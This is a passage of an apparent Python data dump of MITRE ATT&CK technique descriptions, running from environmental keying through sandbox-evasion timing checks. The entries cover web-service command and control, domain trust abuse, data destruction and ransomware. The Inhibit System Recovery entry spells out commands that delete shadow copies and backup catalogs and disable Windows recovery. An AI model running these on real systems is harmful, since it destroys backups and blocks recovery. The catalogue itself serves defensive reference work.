                              'difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure '
                              'of capabilities in environments that are not intended to be compromised or operated '
                              'within.\n'
                              '\n'
                              'Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), '
                              'environmental keying can be used to prevent exposure of capabilities in environments '
                              'that are not intended to be compromised or operated within. This activity is distinct '
                              'from typical [Virtualization/Sandbox '
                              'Evasion](https://attack.mitre.org/techniques/T1497). While use of '
                              '[Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve '
                              'checking for known sandbox values and continuing with execution only if there is no '
                              'match, the use of environmental keying will involve checking for an expected '
                              'target-specific value that must match for decryption and subsequent execution to be '
                              'successful.',
               'name': 'Environmental Keying',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1481': {'attack_id': 'T1481',
           'categories': ['command-and-control'],
           'description': 'Adversaries may use an existing, legitimate external Web service as a means for relaying '
                          'data to/from a compromised system. Popular websites and social media, acting as a mechanism '
                          'for C2, may give a significant amount of cover. This is due to the likelihood that hosts '
                          'within a network are already communicating with them prior to a compromise. Using common '
                          'services, such as those offered by Google or Twitter, makes it easier for adversaries to '
                          'hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving '
                          'adversaries an added level of protection. \n'
                          '\n'
                          ' \n'
                          '\n'
                          'Use of Web services may also protect back-end C2 infrastructure from discovery through '
                          'malware binary analysis, or enable operational resiliency (since this infrastructure may be '
                          'dynamically changed). \n'
                          '\n'
                          ' ',
           'name': 'Web Service',
           'platforms': ['Android', 'iOS']},
 'T1481.001': {'attack_id': 'T1481.001',
               'categories': ['command-and-control'],
               'description': 'Adversaries may use an existing, legitimate external Web service to host information '
                              'that points to additional command and control (C2) infrastructure. Adversaries may post '
                              'content, known as a dead drop resolver, on Web services with embedded (and often '
                              'obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to '
                              'and be redirected by these resolvers. \n'
                              '\n'
                              ' \n'
                              '\n'
                              'Popular websites and social media, acting as a mechanism for C2, may give a significant '
                              'amount of cover. This is due to the likelihood that hosts within a network are already '
                              'communicating with them prior to a compromise. Using common services, such as those '
                              'offered by Google or Twitter, makes it easier for adversaries to hide in expected '
                              'noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an '
                              'added level of protection. \n'
                              '\n'
                              ' \n'
                              '\n'
                              'Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery '
                              'through malware binary analysis, or enable operational resiliency (since this '
                              'infrastructure may be dynamically changed). ',
               'name': 'Dead Drop Resolver',
               'platforms': ['Android', 'iOS']},
 'T1481.002': {'attack_id': 'T1481.002',
               'categories': ['command-and-control'],
               'description': 'Adversaries may use an existing, legitimate external Web service channel as a means for '
                              'sending commands to and receiving output from a compromised system. Compromised systems '
                              'may leverage popular websites and social media to host command and control (C2) '
                              'instructions. Those infected systems can then send the output from those commands back '
                              'over that Web service channel. The return traffic may occur in a variety of ways, '
                              'depending on the Web service being utilized. For example, the return traffic may take '
                              'the form of the compromised system posting a comment on a forum, issuing a pull request '
                              'to development project, updating a document hosted on a Web service, or by sending a '
                              'Tweet. \n'
                              '\n'
                              ' \n'
                              '\n'
                              'Popular websites and social media, acting as a mechanism for C2, may give a significant '
                              'amount of cover. This is due to the likelihood that hosts within a network are already '
                              'communicating with them prior to a compromise. Using common services, such as those '
                              'offered by Google or Twitter, makes it easier for adversaries to hide in expected '
                              'noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an '
                              'added level of protection. ',
               'name': 'Bidirectional Communication',
               'platforms': ['Android', 'iOS']},
 'T1481.003': {'attack_id': 'T1481.003',
               'categories': ['command-and-control'],
               'description': 'Adversaries may use an existing, legitimate external Web service channel as a means for '
                              'sending commands to a compromised system without receiving return output. Compromised '
                              'systems may leverage popular websites and social media to host command and control (C2) '
                              'instructions. Those infected systems may opt to send the output from those commands '
                              'back over a different C2 channel, including to another distinct Web service. '
                              'Alternatively, compromised systems may return no output at all in cases where '
                              'adversaries want to send instructions to systems and do not want a response. \n'
                              '\n'
                              ' \n'
                              '\n'
                              'Popular websites and social media, acting as a mechanism for C2, may give a significant '
                              'amount of cover. This is due to the likelihood that hosts within a network are already '
                              'communicating with them prior to a compromise. Using common services, such as those '
                              'offered by Google or Twitter, makes it easier for adversaries to hide in expected '
                              'noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an '
                              'added level of protection. ',
               'name': 'One-Way Communication',
               'platforms': ['Android', 'iOS']},
 'T1482': {'attack_id': 'T1482',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to gather information on domain trust relationships that may be '
                          'used to identify lateral movement opportunities in Windows multi-domain/forest '
                          'environments. Domain trusts provide a mechanism for a domain to allow access to resources '
                          'based on the authentication procedures of another domain.(Citation: Microsoft Trusts) '
                          'Domain trusts allow the users of the trusted domain to access resources in the trusting '
                          'domain. The information discovered may help the adversary conduct [SID-History '
                          'Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the '
                          'Ticket](https://attack.mitre.org/techniques/T1550/003), and '
                          '[Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity '
                          'Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated '
                          'using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: '
                          'Harmj0y Domain Trusts) The Windows utility '
                          '[Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to '
                          'enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)',
           'name': 'Domain Trust Discovery',
           'platforms': ['Windows']},
 'T1484': {'attack_id': 'T1484',
           'categories': ['defense-evasion', 'privilege-escalation'],
           'description': 'Adversaries may modify the configuration settings of a domain or identity tenant to evade '
                          'defenses and/or escalate privileges in centrally managed environments. Such services '
                          'provide a centralized means of managing identity resources such as devices and accounts, '
                          'and often include configuration settings that may apply between domains or tenants such as '
                          'trust relationships, identity syncing, or identity federation.\n'
                          '\n'
                          'Modifications to domain or tenant settings may include altering domain Group Policy Objects '
                          '(GPOs) in Microsoft Active Directory (AD) or changing trust settings for domains, including '
                          'federation trusts relationships between domains or tenants.\n'
                          '\n'
                          'With sufficient permissions, adversaries can modify domain or tenant policy settings. Since '
                          'configuration settings for these services apply to a large number of identity resources, '
                          'there are a great number of potential attacks malicious outcomes that can stem from this '
                          'abuse. Examples of such abuse include:  \n'
                          '\n'
                          '* modifying GPOs to push a malicious [Scheduled '
                          'Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain '
                          'environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to '
                          'GPOs)(Citation: Harmj0y Abusing GPO Permissions)\n'
                          '* modifying domain trusts to include an adversary-controlled domain, allowing adversaries '
                          'to  forge access tokens that will subsequently be accepted by victim domain '
                          'resources(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)\n'
                          '* changing configuration settings within the AD environment to implement a [Rogue Domain '
                          'Controller](https://attack.mitre.org/techniques/T1207).\n'
                          '* adding new, adversary-controlled federated identity providers to identity tenants, '
                          'allowing adversaries to authenticate as any user managed by the victim tenant (Citation: '
                          'Okta Cross-Tenant Impersonation 2023)\n'
                          '\n'
                          'Adversaries may temporarily modify domain or tenant policy, carry out a malicious '
                          'action(s), and then revert the change to remove suspicious indicators.',
           'name': 'Domain or Tenant Policy Modification',
           'platforms': ['Windows', 'Azure AD', 'SaaS']},
 'T1484.001': {'attack_id': 'T1484.001',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may modify Group Policy Objects (GPOs) to subvert the intended '
                              'discretionary access controls for a domain, usually with the intention of escalating '
                              'privileges on the domain. Group policy allows for centralized management of user and '
                              'computer settings in Active Directory (AD). GPOs are containers for group policy '
                              'settings made up of files stored within a predictable network path '
                              '`\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\`.(Citation: TechNet Group Policy '
                              'Basics)(Citation: ADSecurity GPO Persistence 2016) \n'
                              '\n'
                              'Like other objects in AD, GPOs have access controls associated with them. By default '
                              'all user accounts in the domain have permission to read GPOs. It is possible to '
                              'delegate GPO access control permissions, e.g. write access, to specific users or groups '
                              'in the domain.\n'
                              '\n'
                              'Malicious GPO modifications can be used to implement many other malicious behaviors '
                              'such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or '
                              'Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool '
                              'Transfer](https://attack.mitre.org/techniques/T1105), [Create '
                              'Account](https://attack.mitre.org/techniques/T1136), [Service '
                              'Execution](https://attack.mitre.org/techniques/T1569/002),  and more.(Citation: '
                              'ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y '
                              'Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking '
                              'Team Breach) Since GPOs can control so many user and machine settings in the AD '
                              'environment, there are a great number of potential attacks that can stem from this GPO '
                              'abuse.(Citation: Wald0 Guide to GPOs)\n'
                              '\n'
                              'For example, publicly available scripts such as <code>New-GPOImmediateTask</code> can '
                              'be leveraged to automate the creation of a malicious [Scheduled '
                              'Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this '
                              'case modifying '
                              '<code>&lt;GPO_PATH&gt;\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml</code>.(Citation: '
                              'Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an '
                              'adversary might modify specific user rights like SeEnableDelegationPrivilege, set in '
                              '<code>&lt;GPO_PATH&gt;\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf</code>, to '
                              'achieve a subtle AD backdoor with complete control of the domain because the user '
                              "account under the adversary's control would then be able to modify GPOs.(Citation: "
                              'Harmj0y SeEnableDelegationPrivilege Right)',
               'name': 'Group Policy Modification',
               'platforms': ['Windows']},
 'T1484.002': {'attack_id': 'T1484.002',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may add new domain trusts, modify the properties of existing domain trusts, '
                              'or otherwise change the configuration of trust relationships between domains and '
                              'tenants to evade defenses and/or elevate privileges.Trust details, such as whether or '
                              'not user identities are federated, allow authentication and authorization properties to '
                              'apply between domains or tenants for the purpose of accessing shared '
                              'resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include '
                              'accounts, credentials, and other authentication material applied to servers, tokens, '
                              'and domains.\n'
                              '\n'
                              'Manipulating these trusts may allow an adversary to escalate privileges and/or evade '
                              'defenses by modifying settings to add objects which they control. For example, in '
                              'Microsoft Active Directory (AD) environments, this may be used to forge [SAML '
                              'Tokens](https://attack.mitre.org/techniques/T1606/002) without the need to compromise '
                              'the signing certificate to forge new credentials. Instead, an adversary can manipulate '
                              'domain trusts to add their own signing certificate. An adversary may also convert an AD '
                              'domain to a federated domain using Active Directory Federation Services (AD FS), which '
                              'may enable malicious trust modifications such as altering the claim issuance rules to '
                              'log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD '
                              'Federated Domain) \n'
                              '\n'
                              'An adversary may also add a new federated identity provider to an identity tenant such '
                              'as Okta, which may enable the adversary to authenticate as any user of the '
                              'tenant.(Citation: Okta Cross-Tenant Impersonation 2023)',
               'name': 'Trust Modification',
               'platforms': ['Windows', 'Azure AD', 'SaaS']},
 'T1485': {'attack_id': 'T1485',
           'categories': ['impact'],
           'description': 'Adversaries may destroy data and files on specific systems or in large numbers on a network '
                          'to interrupt availability to systems, services, and network resources. Data destruction is '
                          'likely to render stored data irrecoverable by forensic techniques through overwriting files '
                          'or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye '
                          'Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill '
                          '2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common '
                          'operating system file deletion commands such as <code>del</code> and <code>rm</code> often '
                          'only remove pointers to files without wiping the contents of the files themselves, making '
                          'the files recoverable by proper forensic methodology. This behavior is distinct from [Disk '
                          'Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure '
                          'Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed '
                          "rather than sections of a storage disk or the disk's logical structure.\n"
                          '\n'
                          'Adversaries may attempt to overwrite files and directories with randomly generated data to '
                          'make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 '
                          '2018) In some cases politically oriented image files have been used to overwrite '
                          'data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: '
                          'Kaspersky StoneDrill 2017)\n'
                          '\n'
                          'To maximize impact on the target organization in operations where network-wide availability '
                          'interruption is the goal, malware designed for destroying data may have worm-like features '
                          'to propagate across a network by leveraging additional techniques like [Valid '
                          'Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential '
                          'Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin '
                          'Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon '
                          '2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: '
                          'Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).\n'
                          '\n'
                          'In cloud environments, adversaries may leverage access to delete cloud storage, cloud '
                          'storage accounts, machine images, and other infrastructure crucial to operations to damage '
                          'an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: '
                          'DOJ  - Cisco Insider)',
           'name': 'Data Destruction',
           'platforms': ['Windows', 'IaaS', 'Linux', 'macOS', 'Containers']},
 'T1486': {'attack_id': 'T1486',
           'categories': ['impact'],
           'description': 'Adversaries may encrypt data on target systems or on large numbers of systems in a network '
                          'to interrupt availability to system and network resources. They can attempt to render '
                          'stored data inaccessible by encrypting files or data on local and remote drives and '
                          'withholding access to a decryption key. This may be done in order to extract monetary '
                          'compensation from a victim in exchange for decryption or a decryption key (ransomware) or '
                          'to render data permanently inaccessible in cases where the key is not saved or '
                          'transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: '
                          'US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)\n'
                          '\n'
                          'In the case of ransomware, it is typical that common user files like Office documents, '
                          'PDFs, images, videos, audio, text, and source code files will be encrypted (and often '
                          'renamed and/or tagged with specific file markers). Adversaries may need to first employ '
                          'other behaviors, such as [File and Directory Permissions '
                          'Modification](https://attack.mitre.org/techniques/T1222) or [System '
                          'Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain '
                          'access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, '
                          'adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: '
                          'US-CERT NotPetya 2017) \n'
                          '\n'
                          'To maximize impact on the target organization, malware designed for encrypting data may '
                          'have worm-like features to propagate across a network by leveraging other attack techniques '
                          'like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential '
                          'Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin '
                          'Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry '
                          '2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal '
                          'Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim '
                          'wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to '
                          'connected printers (known as "print bombing").(Citation: NHS Digital Egregor Nov 2020)\n'
                          '\n'
                          'In cloud environments, storage objects within compromised accounts may also be '
                          'encrypted.(Citation: Rhino S3 Ransomware Part 1)',
           'name': 'Data Encrypted for Impact',
           'platforms': ['Linux', 'macOS', 'Windows', 'IaaS']},
 'T1489': {'attack_id': 'T1489',
           'categories': ['impact'],
           'description': 'Adversaries may stop or disable services on a system to render those services unavailable '
                          'to legitimate users. Stopping critical services or processes can inhibit or stop response '
                          "to an incident or aid in the adversary's overall objectives to cause damage to the "
                          'environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) \n'
                          '\n'
                          'Adversaries may accomplish this by disabling individual services of high importance to an '
                          'organization, such as <code>MSExchangeIS</code>, which will make Exchange content '
                          'inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or '
                          'disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer '
                          '2018) Services or processes may not allow for modification of their data stores while '
                          'running. Adversaries may stop services or processes in order to conduct [Data '
                          'Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for '
                          'Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like '
                          'Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)',
           'name': 'Service Stop',
           'platforms': ['Windows', 'Linux', 'macOS']},
 'T1490': {'attack_id': 'T1490',
           'categories': ['impact'],
           'description': 'Adversaries may delete or remove built-in data and turn off services designed to aid in the '
                          'recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer '
                          '2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and '
                          'recovery options.\n'
                          '\n'
                          'Operating systems may contain features that can help fix corrupted systems, such as a '
                          'backup catalog, volume shadow copies, and automatic repair features. Adversaries may '
                          'disable or delete system recovery features to augment the effects of [Data '
                          'Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for '
                          'Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer '
                          '2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery '
                          'notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)\n'
                          '\n'
                          'A number of native Windows utilities have been used by adversaries to disable or delete '
                          'system recovery features:\n'
                          '\n'
                          '* <code>vssadmin.exe</code> can be used to delete all volume shadow copies on a system - '
                          '<code>vssadmin.exe delete shadows /all /quiet</code>\n'
                          '* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be '
                          'used to delete volume shadow copies - <code>wmic shadowcopy delete</code>\n'
                          '* <code>wbadmin.exe</code> can be used to delete the Windows Backup Catalog - '
                          '<code>wbadmin.exe delete catalog -quiet</code>\n'
                          '* <code>bcdedit.exe</code> can be used to disable automatic Windows recovery features by '
                          'modifying boot configuration data - <code>bcdedit.exe /set {default} bootstatuspolicy '
                          'ignoreallfailures & bcdedit /set {default} recoveryenabled no</code>\n'
                          '* <code>REAgentC.exe</code> can be used to disable Windows Recovery Environment (WinRE) '
                          'repair/recovery options of an infected system\n'
                          '* <code>diskshadow.exe</code> can be used to delete all volume shadow copies on a system - '
                          '<code>diskshadow delete shadows all</code> (Citation: Diskshadow) (Citation: Crytox '
                          'Ransomware)\n'
                          '\n'
                          'On network devices, adversaries may leverage [Disk '
                          'Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and '
                          'reformat the file system, then [System '
                          'Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together '
                          'this activity may leave network devices completely inoperable and inhibit recovery '
                          'operations.\n'
                          '\n'
                          'Adversaries may also delete “online” backups that are connected to their network – whether '
                          'via network storage media or through folders that sync to cloud services.(Citation: ZDNet '
                          'Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and '
                          'backup policies and delete snapshots, machine images, and prior versions of objects '
                          'designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces '
                          'Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)',
           'name': 'Inhibit System Recovery',
           'platforms': ['Windows', 'macOS', 'Linux', 'Network', 'IaaS', 'Containers']},
 'T1491': {'attack_id': 'T1491',
           'categories': ['impact'],
           'description': 'Adversaries may modify visual content available internally or externally to an enterprise '
                          'network, thus affecting the integrity of the original content. Reasons for '
                          '[Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, '
                          'intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive '
                          'images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in '
                          'order to cause user discomfort, or to pressure compliance with accompanying messages. \n',
           'name': 'Defacement',
           'platforms': ['Windows', 'IaaS', 'Linux', 'macOS']},
 'T1491.001': {'attack_id': 'T1491.001',
               'categories': ['impact'],
               'description': 'An adversary may deface systems internal to an organization in an attempt to intimidate '
                              'or mislead users, thus discrediting the integrity of the systems. This may take the '
                              'form of modifications to internal websites, or directly to user systems with the '
                              'replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or '
                              'offensive images may be used as a part of [Internal '
                              'Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user '
                              'discomfort, or to pressure compliance with accompanying messages. Since internally '
                              "defacing systems exposes an adversary's presence, it often takes place after other "
                              'intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive '
                              'Malware)',
               'name': 'Internal Defacement',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1491.002': {'attack_id': 'T1491.002',
               'categories': ['impact'],
               'description': 'An adversary may deface systems external to an organization in an attempt to deliver '
                              'messaging, intimidate, or otherwise mislead an organization or users. [External '
                              'Defacement](https://attack.mitre.org/techniques/T1491/002) may ultimately cause users '
                              'to distrust the systems and to question/discredit the system’s integrity. '
                              'Externally-facing websites are a common victim of defacement; often targeted by '
                              'adversary and hacktivist groups in order to push a political message or spread '
                              'propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia '
                              'Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface '
                              'Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) '
                              'may be used as a catalyst to trigger events, or as a response to actions taken by an '
                              'organization or government. Similarly, website defacement may also be used as setup, or '
                              'a precursor, for future attacks such as [Drive-by '
                              'Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive '
                              'Into Defacement)',
               'name': 'External Defacement',
               'platforms': ['Windows', 'IaaS', 'Linux', 'macOS']},
 'T1495': {'attack_id': 'T1495',
           'categories': ['impact'],
           'description': 'Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other '
                          'firmware in devices attached to a system in order to render them inoperable or unable to '
                          'boot, thus denying the availability to use the devices and/or the system.(Citation: '
                          'Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from '
                          'non-volatile memory on hardware devices in order to initialize and manage device '
                          'functionality. These devices may include the motherboard, hard drive, or video cards.\n'
                          '\n'
                          'In general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the '
                          'use of the system or devices. For example, corruption of firmware responsible for loading '
                          'the operating system for network devices may render the network devices '
                          'inoperable.(Citation: dhs_threat_to_net_devices)(Citation: cisa_malware_orgs_ukraine) '
                          'Depending on the device, this attack may also result in [Data '
                          'Destruction](https://attack.mitre.org/techniques/T1485). ',
           'name': 'Firmware Corruption',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1496': {'attack_id': 'T1496',
           'categories': ['impact'],
           'description': 'Adversaries may leverage the resources of co-opted systems to complete resource-intensive '
                          'tasks, which may impact system and/or hosted service availability. \n'
                          '\n'
                          'One common purpose for Resource Hijacking is to validate transactions of cryptocurrency '
                          'networks and earn virtual currency. Adversaries may consume enough system resources to '
                          'negatively impact and/or cause affected machines to become unresponsive.(Citation: '
                          'Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common '
                          'targets because of the high potential for available resources, but user endpoint systems '
                          'may also be compromised and used for Resource Hijacking and cryptocurrency '
                          'mining.(Citation: CloudSploit - Unused AWS Regions) Containerized environments may also be '
                          'targeted due to the ease of deployment via exposed APIs and the potential for scaling '
                          'mining activities by deploying or compromising multiple containers within an environment or '
                          'cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)\n'
                          '\n'
                          'Additionally, some cryptocurrency mining malware identify then kill off processes for '
                          'competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of '
                          'Crypto Miners)\n'
                          '\n'
                          "Adversaries may also use malware that leverages a system's network bandwidth as part of a "
                          'botnet in order to facilitate [Network Denial of '
                          'Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious '
                          'torrents.(Citation: GoBotKR) Alternatively, they may engage in proxyjacking by selling use '
                          "of the victims' network bandwidth and IP address to proxyware services.(Citation: Sysdig "
                          'Proxyjacking)',
           'name': 'Resource Hijacking',
           'platforms': ['Windows', 'IaaS', 'Linux', 'macOS', 'Containers']},
 'T1497': {'attack_id': 'T1497',
           'categories': ['defense-evasion', 'discovery'],
           'description': 'Adversaries may employ various means to detect and avoid virtualization and analysis '
                          'environments. This may include changing behaviors based on the results of checks for the '
                          'presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the '
                          'adversary detects a VME, they may alter their malware to disengage from the victim or '
                          'conceal the core functions of the implant. They may also search for VME artifacts before '
                          'dropping secondary or additional payloads. Adversaries may use the information learned from '
                          '[Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during '
                          'automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment '
                          'Awareness)\n'
                          '\n'
                          'Adversaries may use several methods to accomplish [Virtualization/Sandbox '
                          'Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security '
                          'monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated '
                          'with analysis or virtualization. Adversaries may also check for legitimate user activity to '
                          'help determine if it is in an analysis environment. Additional methods include use of sleep '
                          'timers or loops within malware code to avoid operating within a temporary '
                          'sandbox.(Citation: Unit 42 Pirpi July 2015)\n'
                          '\n',
           'name': 'Virtualization/Sandbox Evasion',
           'platforms': ['Windows', 'macOS', 'Linux']},
 'T1497.001': {'attack_id': 'T1497.001',
               'categories': ['defense-evasion', 'discovery'],
               'description': 'Adversaries may employ various system checks to detect and avoid virtualization and '
                              'analysis environments. This may include changing behaviors based on the results of '
                              'checks for the presence of artifacts indicative of a virtual machine environment (VME) '
                              'or sandbox. If the adversary detects a VME, they may alter their malware to disengage '
                              'from the victim or conceal the core functions of the implant. They may also search for '
                              'VME artifacts before dropping secondary or additional payloads. Adversaries may use the '
                              'information learned from [Virtualization/Sandbox '
                              'Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape '
                              'follow-on behaviors.(Citation: Deloitte Environment Awareness)\n'
                              '\n'
                              'Specific checks will vary based on the target and/or adversary, but may involve '
                              'behaviors such as [Windows Management '
                              'Instrumentation](https://attack.mitre.org/techniques/T1047), '
                              '[PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information '
                              'Discovery](https://attack.mitre.org/techniques/T1082), and [Query '
                              'Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and '
                              'search for VME artifacts. Adversaries may search for VME artifacts in memory, '
                              'processes, file system, hardware, and/or the Registry. Adversaries may use scripting to '
                              'automate these checks  into one script and then have the program exit if it determines '
                              'the system to be a virtual environment. \n'
                              '\n'
                              'Checks could include generic system properties such as host/domain name and samples of '
                              'network traffic. Adversaries may also check the network adapters addresses, CPU core '
                              'count, and available memory/drive size. Once executed, malware may also use [File and '
                              'Directory Discovery](https://attack.mitre.org/techniques/T1083) to check if it was '
                              'saved in a folder or file with unexpected or even analysis-related naming artifacts '
                              'such as `malware`, `sample`, or `hash`.\n'
                              '\n'
                              'Other common checks may enumerate services running that are unique to these '
                              'applications, installed programs on the system, manufacturer/product fields for strings '
                              'relating to virtual machine applications, and VME-specific hardware/processor '
                              'instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, '
                              'adversaries can also use a special I/O port to send commands and receive output. \n'
                              ' \n'
                              'Hardware checks, such as the presence of the fan, temperature, and audio devices, could '
                              'also be used to gather evidence that can be indicative a virtual environment. '
                              'Adversaries may also query for specific readings from these devices.(Citation: Unit 42 '
                              'OilRig Sept 2018)',
               'name': 'System Checks',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1497.002': {'attack_id': 'T1497.002',
               'categories': ['defense-evasion', 'discovery'],
               'description': 'Adversaries may employ various user activity checks to detect and avoid virtualization '
                              'and analysis environments. This may include changing behaviors based on the results of '
                              'checks for the presence of artifacts indicative of a virtual machine environment (VME) '
                              'or sandbox. If the adversary detects a VME, they may alter their malware to disengage '
                              'from the victim or conceal the core functions of the implant. They may also search for '
                              'VME artifacts before dropping secondary or additional payloads. Adversaries may use the '
                              'information learned from [Virtualization/Sandbox '
                              'Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape '
                              'follow-on behaviors.(Citation: Deloitte Environment Awareness)\n'
                              '\n'
                              'Adversaries may search for user activity on the host based on variables such as the '
                              'speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , '
                              'browser history, cache, bookmarks, or number of files in common directories such as '
                              'home or the desktop. Other methods may rely on specific user interaction with the '
                              'system before the malicious code is activated, such as waiting for a document to close '
                              'before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to '
                              'double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017) ',
               'name': 'User Activity Based Checks',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1497.003': {'attack_id': 'T1497.003',
               'categories': ['defense-evasion', 'discovery'],
               'description': 'Adversaries may employ various time-based methods to detect and avoid virtualization '
                              'and analysis environments. This may include enumerating time-based properties, such as '
                              'uptime or the system clock, as well as the use of timers or other triggers to avoid a '
                              'virtual machine environment (VME) or sandbox, specifically those that are automated or '
                              'only operate for a limited amount of time.\n'
                              '\n'
                              'Adversaries may employ various time-based evasions, such as delaying malware '
                              'functionality upon initial execution using programmatic sleep commands or native system '
                              'scheduling functionality (ex: [Scheduled '
                              'Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on '
                              'waiting for specific victim conditions to be met (ex: system time, events, etc.) or '
                              'employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to '
